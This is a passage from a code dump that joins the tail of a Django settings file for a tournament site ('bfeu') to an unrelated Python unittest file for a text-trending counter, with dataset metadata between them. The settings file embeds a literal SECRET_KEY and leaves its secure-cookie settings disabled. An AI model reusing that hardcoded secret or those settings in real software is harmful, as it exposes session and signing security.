# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'Europe/Amsterdam'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/var/www/example.com/media/"
MEDIA_ROOT = os.path.join(ROOT_DIR, 'media')
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://example.com/media/", "http://media.example.com/"
MEDIA_URL = '/media/'
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/var/www/example.com/static/"
STATIC_ROOT = os.path.join(ROOT_DIR, 'static')
# URL prefix for static files.
# Example: "http://example.com/static/", "http://static.example.com/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
os.path.join(DJANGO_PROJECT_DIR, 'static'),
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = [
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'compressor.finders.CompressorFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
]
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'u_$=j1yn4iil1e6y358std&4h1t!57m9ddwr#4069_!4%2p$su'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = [
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
# External middleware.
'maintenancemode.middleware.MaintenanceModeMiddleware',
'axes.middleware.FailedLoginMiddleware'
]
ROOT_URLCONF = 'bfeu.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'bfeu.wsgi.application'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
os.path.join(DJANGO_PROJECT_DIR, 'templates'),
)
FIXTURE_DIRS = (
os.path.join(DJANGO_PROJECT_DIR, 'fixtures'),
)
INSTALLED_APPS = [
# Note: contenttypes should be first, see Django ticket #10827
'django.contrib.contenttypes',
'django.contrib.auth',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Optional applications.
'django.contrib.admin',
#'django.contrib.humanize',
#'django.contrib.sitemaps',
# External applications.
'axes',
'south',
'compressor',
# Project applications.
'bfeu.tournaments'
]
LOGGING_DIR = os.path.join(ROOT_DIR, 'log')
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'verbose': {
'format': '%(asctime)s %(levelname)s %(name)s %(module)s %(process)d %(thread)d %(message)s'
},
'timestamped': {
'format': '%(asctime)s %(levelname)s %(name)s %(message)s'
},
'simple': {
'format': '%(levelname)s %(message)s'
},
'performance': {
'format': '%(asctime)s %(process)d | %(thread)d | %(message)s',
},
},
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
},
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
},
'null': {
'level': 'DEBUG',
'class': 'django.utils.log.NullHandler',
},
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'timestamped'
},
'django': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'filename': os.path.join(LOGGING_DIR, 'django.log'),
'formatter': 'verbose'
},
'project': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'filename': os.path.join(LOGGING_DIR, 'bfeu.log'),
'formatter': 'verbose'
},
'performance': {
'level': 'INFO',
'class': 'logging.FileHandler',
'filename': os.path.join(LOGGING_DIR, 'performance.log'),
'formatter': 'performance'
},
},
'loggers': {
'bfeu': {
'handlers': ['project'],
'level': 'INFO',
'propagate': True,
},
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
#
# Additional Django settings
# Enable these when using HTTPS
#
SESSION_COOKIE_NAME = 'bfeusessionid'
# SESSION_COOKIE_SECURE = True
# SESSION_COOKIE_HTTPONLY = True
# CSRF_COOKIE_SECURE = True
# X_FRAME_OPTIONS = 'DENY'
#
# Django-axes
#
AXES_LOGIN_FAILURE_LIMIT = 3 # Default: 3
AXES_LOCK_OUT_AT_FAILURE = True # Default: True
AXES_USE_USER_AGENT = False # Default: False
| mit | -1,098,656,257,339,263,600 | 30.912698 | 127 | 0.642502 | false |
leecannon/trending | trending/tests/test_count.py | 1 | 3138 | # Copyright (c) 2016 Lee Cannon
# Licensed under the MIT License, see included LICENSE File
from unittest import TestCase
from trending import count
from trending import interaction
def _create_test_interactions():
i = interaction.Interaction('12/10/2016 03:15:55', 'ENTERPRISE ENTERPRISE USER DIRECTORY', 'DIIR-GB-BOU',
'JONESD302@DIIR', 'DAYR110@DIIR', 'UK-SD002808024')
i2 = interaction.Interaction('12/10/2016 03:45:55', 'ENTERPRISE USER DIRECTORY', 'DIIR-GB-BOU',
'JONESD302@DIIR', 'DAYR110@DIIR', 'UK-SD002808024')
i3 = interaction.Interaction('12/10/2016 03:45:55', 'dial tone', 'DIIR-GB-BOU',
'JONESD302@DIIR', 'DAYR110@DIIR', 'UK-SD002808024')
i4 = interaction.Interaction('12/10/2016 03:45:55', '**modnet**modnet outlook user', 'DIIR-GB-CRN',
'JONESD302@DIIR', 'DAYR110@DIIR', 'UK-SD002808024')
i5 = interaction.Interaction('12/10/2016 03:45:55', 'modnet outlook USER complaint complaint*email,email-email',
'DIIR-GB-ABW', 'JONESD302@DIIR', 'DAYR110@DIIR', 'UK-SD002808024')
i6 = interaction.Interaction('12/10/2016 03:45:55', 'modnet outlook USER complaint complaint*email,email-email',
'DIIR-GB-OWN', 'JONESD302@DIIR', 'DAYR110@DIIR', 'UK-SD002808024')
return [i, i2, i3, i4, i5, i6]
class TestCount(TestCase):
def setUp(self):
self.interactions = _create_test_interactions()
def test_Number(self):
self.assertEqual(count.count_interactions(self.interactions), len(self.interactions))
def test_CountTrigrams(self):
temp = count.count_trigrams(self.interactions, minimum=0)
for trigram in temp:
if trigram[0] == 'BOU':
self.assertEqual(trigram[1], 3)
elif trigram[0] == 'CRN':
self.assertEqual(trigram[1], 1)
elif trigram[0] == 'ABW':
self.assertEqual(trigram[1], 1)
temp = count.count_trigrams(self.interactions, minimum=0, include_unknown=True)
self.assertTrue(('OWN', 1) in temp)
def test_CountWords(self):
temp = count.count_words(self.interactions)
self.assertEqual(sorted(temp), sorted([
('outlook', 3),
('modnet', 3),
('directory', 2),
('enterprise', 2)
]))
def test_CountWordsAtTrigram(self):
temp = count.count_words_at_trigrams(self.interactions, ['BOU'])
self.assertEqual(sorted(temp), sorted([
('directory', 2),
('enterprise', 2)
]))
temp = count.count_words_at_trigrams(self.interactions, ['ABW'])
self.assertEqual(temp, [])
temp = count.count_words_at_trigrams(self.interactions, ['BOU', 'ABW'])
self.assertEqual(sorted(temp), sorted([
('directory', 2),
('enterprise', 2)
]))
def test_CountTrigramWithWord(self):
temp = count.count_trigram_with_words(self.interactions, ['directory'])
self.assertEqual(temp, [('BOU', 2)])
| mit | -4,855,461,745,092,158,000 | 44.478261 | 116 | 0.59369 | false |